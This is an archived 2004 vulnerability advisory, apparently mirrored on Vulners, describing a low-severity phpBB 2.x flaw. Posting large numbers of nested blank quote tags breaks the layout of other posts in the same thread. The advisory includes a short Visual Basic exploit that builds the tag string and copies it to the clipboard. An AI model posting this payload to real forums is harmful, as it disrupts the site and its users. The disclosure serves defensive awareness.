Vulners
Lucene search
phpbbquoteflaw.txt
`Affected Software: phpBB 2.x (tested on 2.0.4 and 2.0.8, untested on later versions)
Vulnerability: flaw in code handling the quoting of posts.
Severity: Low
Discovered by: Matt Benenati <darkk88[AT]gmail.com>
+Details+
=========
This flaw could allow a malicious user
to alter the alignment and layout of any posts in the same thread as the exploit post.
The exploit just involves using an absurd amount of blank quotes in a single post.
+Exploit Code+
=============
'phpBB Quote Exploit
'Copyright (C) 2004 by Matt Benenati
'
'text is automaticly copied to the windows clipboard
'user just has to paste the text into a post to execute the exploit
Private Sub Command1_Click()
Dim xptext As String
Dim num1 As Integer, num2 As Integer, num3 As Integer, num4 As Integer
num1% = 0
num2% = 100
num3% = 0
num4% = 100
1: xptext$ = xptext$ & "[quote]"
num1% = num1% + 1
If num1% = num2% Then GoTo 2 Else GoTo 1
2: xptext$ = xptext$ & "[/quote]"
num3% = num3% + 1
If num3% = num4% Then GoTo 3 Else GoTo 2
3: Clipboard.Clear
Clipboard.SetText xptext$
End Sub
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Dec 2004 00:00Current
7.4High risk
Vulners AI Score7.4